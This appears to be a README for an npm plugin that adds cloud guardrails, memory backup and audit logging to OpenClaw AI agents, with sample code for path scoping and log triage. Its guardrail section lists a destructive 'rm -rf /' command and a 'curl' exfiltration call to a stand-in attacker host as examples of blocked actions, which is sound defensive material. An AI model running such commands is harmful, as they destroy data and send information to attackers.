@agenttrust/agenttrust
v1.0.6
Cloud guardrails, audit logging, and backup for OpenClaw autonomous AI agents
AgentTrust Plugin for OpenClaw
Cloud Guardrails + Backup + Audit Logging for Autonomous AI Agents
AgentTrust provides cloud-first guardrails, automatic memory backup, and immutable audit logging — powered by AgentTrust.ai.
Quick Start
```bash
# 1. Install into OpenClaw's managed plugin directory
openclaw plugins install @agenttrust/agenttrust --pin
# 2. Configure (enter your API key)
agenttrust config
# 3. Restart OpenClaw
openclaw gateway restart
```
Done! Your agent now has cloud guardrails, automatic backups, and audit logging.
Features
✅ Cloud Guardrails (Live)
Real-time validation of tool calls against server-side security policies:
- Manifest-driven: All rules managed server-side (no client config needed)
- Selective monitoring: Only tools in manifest are validated via cloud
- Smart fallback: If cloud unreachable, per-tool fallback action applies
- Zero latency impact: Fire-and-forget with intelligent caching
- Full audit trail: Every validation logged with pattern/rule metadata
Example blocked commands:
- `rm -rf /` → ❌ Blocked (destructive command)
- `curl http://attacker.com` → ❌ Blocked (data exfiltration)
- `npm install safe-package` → ✅ Allowed (low risk)
✅ CloudBackup (Live)
Automatic snapshots of your agent's memory on every gateway restart:
Files backed up:
- `~/.openclaw/openclaw.json`
- `~/.openclaw/workspace/MEMORY.md`
- `~/.openclaw/workspace/SOUL.md`
- `~/.openclaw/workspace/AGENTS.md`
- `~/.openclaw/workspace/memory/` (entire directory)

Other properties:
- Deduplication: SHA-256 hashing prevents redundant storage
- Cross-platform: Works on Windows, Mac, Linux (automatic path handling)
- Fire-and-forget: Zero performance impact, 30s timeout
- Smart limits: Respects `maxFileSizeBytes`, `maxTotalBytes`, `maxFileCount` from server
Security (Client-Side Enforcement):
- Backup scope: ONLY `~/.openclaw/workspace/` and `openclaw.json` can be backed up
- Credential protection: `.env`, `.ssh/`, `*.pem`, `*.key`, credentials auto-blocked
- Zero-trust: Even if server is compromised, only workspace files (minus secrets) are accessible
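A client-side scope check of the kind this list describes, as an added example in Node.js (not the plugin's own source): it expands the server's `~/` notation, rejects anything outside `~/.openclaw/workspace/` or `openclaw.json`, then applies the credential patterns. The names `checkBackupPath`, `expandHome` and `SECRET_SEGMENTS`, the reason strings, and the sample manifest entries are assumptions made for illustration.

```javascript
// Added example (not the plugin's source): lexical scope check for backup paths.
const os = require("os");
const path = require("path");

const OPENCLAW_DIR = path.resolve(os.homedir(), ".openclaw");
const WORKSPACE = path.join(OPENCLAW_DIR, "workspace");
const CONFIG_FILE = path.join(OPENCLAW_DIR, "openclaw.json");

// Patterns from the README's credential list. Matching "credentials" as a
// path-segment prefix is an assumption about what that entry covers.
const SECRET_SEGMENTS = [/^\.env(\..*)?$/i, /^\.ssh$/i, /\.pem$/i, /\.key$/i, /^credentials/i];

// Expand the "~/" notation the server sends; resolve() also folds "." and "..".
function expandHome(p) {
  if (p === "~") return os.homedir();
  if (p.startsWith("~/") || p.startsWith("~\\")) return path.resolve(os.homedir(), p.slice(2));
  return path.resolve(p);
}

// Decide whether a manifest path may be read for backup.
function checkBackupPath(requested) {
  const abs = expandHome(requested);
  if (abs !== CONFIG_FILE) {
    const rel = path.relative(WORKSPACE, abs);
    // Climbing out ("..") or an absolute result (another Windows drive) means
    // outside the workspace; whole-segment comparison rejects "workspace-old".
    if (rel === ".." || rel.startsWith(".." + path.sep) || path.isAbsolute(rel)) {
      return { allowed: false, reason: "out_of_scope" };
    }
  }
  const segments = path.relative(OPENCLAW_DIR, abs).split(path.sep);
  if (segments.some((s) => SECRET_SEGMENTS.some((re) => re.test(s)))) {
    return { allowed: false, reason: "credential_pattern" };
  }
  return { allowed: true, reason: "ok" };
}

// Constructed manifest entries, including traversal and secret cases.
const sampleManifest = [
  "~/.openclaw/workspace/MEMORY.md",
  "~/.openclaw/openclaw.json",
  "~/.openclaw/workspace/../../.ssh/id_rsa",
  "~/.openclaw/workspace/.env",
  "~/.openclaw/workspace-old/SOUL.md",
];
for (const p of sampleManifest) console.log(p, checkBackupPath(p));
```

The check is lexical; where the workspace may contain symlinks, resolve both the candidate and the workspace root with `fs.realpathSync` before comparing.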
Retention tiers:
- Free: 7 days
- Pro: 90 days
- Ultimate: 365 days
✅ Cloud Logging (Live)
Immutable audit trail of every agent action:
- Tool calls — Every `exec`, `read`, `web_search` with full params and outputs
- Prompts — Full context before each LLM decision
- Session events — Session start, reset, stop timestamps
Where logs go:
- Local JSONL: `~/.openclaw/logs/agenttrust/audit.jsonl`
- Remote cloud: `POST https://agenttrust.ai/api/openclaw/cloudlogs`
- Fire-and-forget: 3s timeout, never blocks your agent
🚧 Coming Soon
- Time Machine UI — Restore snapshots from dashboard (v1.1)
- Ops Replay — Reconstruct full sessions from cloud logs (v1.1)
- InjectionGuard — Prompt injection detection (v1.2)
- Semantic Time Travel — Query "what did my agent know on Feb 10?" (v2.0)
Installation
1. Get an API Key
Sign up at agenttrust.ai and create an API key.
2. Install the Plugin
```bash
# Recommended: let OpenClaw install into ~/.openclaw/extensions/agenttrust
openclaw plugins install @agenttrust/agenttrust --pin
# Local development / manual install
openclaw plugins install .
```
OpenClaw installs the package into its managed extensions directory and enables the plugin in config.
3. Configure API Key
The plugin intentionally does not mutate your OpenClaw config during npm install. Set or update your API key explicitly:
```bash
agenttrust config
```
For non-interactive VPS/headless setup:
```bash
agenttrust config --api-key "$AGENTTRUST_API_KEY"
```
4. Restart OpenClaw
```bash
openclaw gateway restart
```
5. Verify It's Working
Check gateway logs after restart:
```bash
tail -20 ~/.openclaw/logs/agenttrust/audit.jsonl
```
You should see backup events:
```json
{"ts":"2026-02-20T13:49:09.035Z","hook":"gateway_start","level":"info","data":{"message":"CloudBackup: uploaded ... files"}}
```
Configuration
Plugin config lives in ~/.openclaw/openclaw.json under plugins.agenttrust:
```json
{
  "plugins": {
    "agenttrust": {
      "enabled": true,
      "cloudBackup": {
        "enabled": true,
        "endpoint": "https://agenttrust.ai"
      },
      "cloudLogging": {
        "enabled": true,
        "endpoint": "https://agenttrust.ai",
        "logLevel": "standard",
        "hooks": [
          "before_tool_call",
          "after_tool_call",
          "before_prompt_build",
          "command:new",
          "command:reset",
          "command:stop"
        ]
      }
    }
  }
}
```
Config Reference
CloudBackup
| Key | Type | Default | Description |
|-----|------|---------|-------------|
| enabled | boolean | true | Toggle automatic backups |
| endpoint | string | https://agenttrust.ai | Server endpoint |
Cloud Logging
| Key | Type | Default | Description |
|-----|------|---------|-------------|
| enabled | boolean | true | Toggle cloud logging |
| endpoint | string | https://agenttrust.ai | Server endpoint |
| logLevel | string | "standard" | Log verbosity: minimal, standard, verbose |
| hooks | string[] | [...] | Which OpenClaw hooks to log |
How It Works
CloudBackup Flow
```
Gateway Start
  ↓
GET /api/openclaw/backup/manifest
  ↓ (server returns paths to back up)
Collect files from paths
  ↓ (SHA-256 hash each file)
POST /api/openclaw/backup/upload
  ↓ (server deduplicates + stores)
Done (fire-and-forget, ~30s max)
```
Manifest-driven: Server tells plugin what to back up. No hardcoded paths in plugin.
Deduplication: Files with identical SHA-256 hashes reuse existing blobs in Cloud Storage.
Skipped files tracked: summary.skipped reports tooLarge, excluded, unreadable, limitReached.
Cloud Logging Flow
```
Agent action (tool call, prompt, session event)
  ↓
Extract event data (params, timestamp, session, etc.)
  ↓
Write to local JSONL (~/.openclaw/logs/agenttrust/audit.jsonl)
  ↓
POST to cloud endpoint (fire-and-forget, 3s timeout)
  ↓
Done (agent never waits)
```
Event types:
- `tool_call_start` — Before tool execution
- `tool_call_end` — After tool completes (includes output + duration)
- `prompt` — Before LLM call (full prompt context)
- `session_new`, `session_reset`, `session_stop` — Session lifecycle
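The local JSONL trail can be checked offline for gaps. This added example (not part of the plugin) pairs `before_tool_call` and `after_tool_call` records, the hook values seen in the entries under Log Files, and reports failed calls, calls with no completion record, and unparseable lines. Records carry no call id on this page, so pairing per session and tool name in arrival order is an assumption, as are the function name `triageAuditLog` and the constructed sample lines.

```javascript
// Added example (not part of the plugin): offline triage of audit.jsonl.
// SAMPLE_LOG is constructed; field names follow the README's example entries.
const SAMPLE_LOG = [
  '{"ts":"2026-02-20T13:49:19.998Z","hook":"before_tool_call","session":"s1","data":{"toolName":"exec","params":{"command":"openclaw gateway restart"}}}',
  '{"ts":"2026-02-20T13:49:20.123Z","hook":"after_tool_call","session":"s1","data":{"toolName":"exec","success":false,"durationMs":125}}',
  '{"ts":"2026-02-20T13:50:01.000Z","hook":"before_tool_call","session":"s1","data":{"toolName":"read","params":{"path":"MEMORY.md"}}}',
  '{"ts":"2026-02-20T13:50:01.040Z","hook":"after_tool_call","session":"s1","data":{"toolName":"read","success":true,"durationMs":40}}',
  '{"ts":"2026-02-20T13:51:00.000Z","hook":"before_tool_call","session":"s2","data":{"toolName":"exec","params":{"command":"ls"}}}',
  '{"ts":"2026-02-20T13:51:0', // torn final line, as after a crash mid-write
].join("\n");

// Assumption: calls to the same tool within a session complete in order,
// so starts and ends are matched first-in, first-out.
function triageAuditLog(text) {
  const pending = new Map(); // "session|tool" -> queue of start records
  const report = { failed: [], unfinished: [], orphanEnds: 0, malformed: 0 };
  for (const line of text.split("\n")) {
    if (!line.trim()) continue;
    let rec;
    try { rec = JSON.parse(line); } catch { report.malformed++; continue; }
    const tool = rec?.data?.toolName;
    if (!tool) continue; // not a tool-call record
    const key = `${rec.session}|${tool}`;
    if (rec.hook === "before_tool_call") {
      if (!pending.has(key)) pending.set(key, []);
      pending.get(key).push(rec);
    } else if (rec.hook === "after_tool_call") {
      const start = (pending.get(key) || []).shift();
      if (!start) { report.orphanEnds++; continue; } // end with no logged start
      if (rec.data.success === false) {
        report.failed.push({ session: rec.session, tool, params: start.data.params, ts: rec.ts });
      }
    }
  }
  // Anything still queued started but never logged a completion.
  for (const queue of pending.values()) {
    for (const s of queue) report.unfinished.push({ session: s.session, tool: s.data.toolName, ts: s.ts });
  }
  return report;
}

console.log(JSON.stringify(triageAuditLog(SAMPLE_LOG), null, 2));
```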
Log Files
Logs are written to ~/.openclaw/logs/agenttrust/audit.jsonl in JSONL format (one JSON object per line).
Example entries:
```json
{"ts":"2026-02-20T13:49:09.035Z","hook":"gateway_start","level":"info","session":"045d8da7-956d-4502-9735-022e93d26d00","agent":"agent:main:main","data":{"message":"CloudBackup: uploading 15 files (68696 bytes)"}}
{"ts":"2026-02-20T13:49:19.998Z","hook":"before_tool_call","level":"verbose","session":"045d8da7-956d-4502-9735-022e93d26d00","agent":"agent:main:main","data":{"toolName":"exec","params":{"command":"openclaw gateway restart","timeout":10}}}
{"ts":"2026-02-20T13:49:20.123Z","hook":"after_tool_call","level":"standard","session":"045d8da7-956d-4502-9735-022e93d26d00","agent":"agent:main:main","data":{"toolName":"exec","success":false,"durationMs":125}}
```
Troubleshooting
Plugin not loading?
- Check `openclaw gateway restart` output for errors
- Verify plugin directory exists: `ls ~/.openclaw/extensions/agenttrust/`
No backups happening?
- Check API key is set: `grep AGENTTRUST_API_KEY ~/.openclaw/workspace/.env`
- Check logs: `tail ~/.openclaw/logs/agenttrust/audit.jsonl`
- Test manifest endpoint: `curl -H "Authorization: Bearer YOUR_KEY" https://agenttrust.ai/api/openclaw/backup/manifest`
Backups timing out?
- Large workspaces may hit 30s limit
- Check server-side limits: `maxFileSizeBytes`, `maxTotalBytes`, `maxFileCount`
- Review `summary.skipped` in upload logs
Cross-platform path issues?
- Plugin uses `os.homedir()` + `path.join()` — paths should work everywhere
- Server sends `~/.openclaw/...` notation (works on all platforms)
API endpoint unreachable?
- Plugin fails silently (fire-and-forget)
- Local JSONL logging continues working
- Check network/firewall
Roadmap
- [x] v0.9.0-beta — CloudBackup + Cloud Logging
- [x] v1.0.0 — Cloud Guardrails (manifest-driven tool validation)
- [ ] v1.1.0 — Time Machine restore UI + Ops Replay
- [ ] v1.2.0 — InjectionGuard
- [ ] v2.0.0 — Semantic Time Travel (query agent memory at specific dates)
Support
- Dashboard: agenttrust.ai
- Docs: This README + plugin source code
- Issues: github.com/agenttrust/agenttrust/issues
License
MIT — See LICENSE
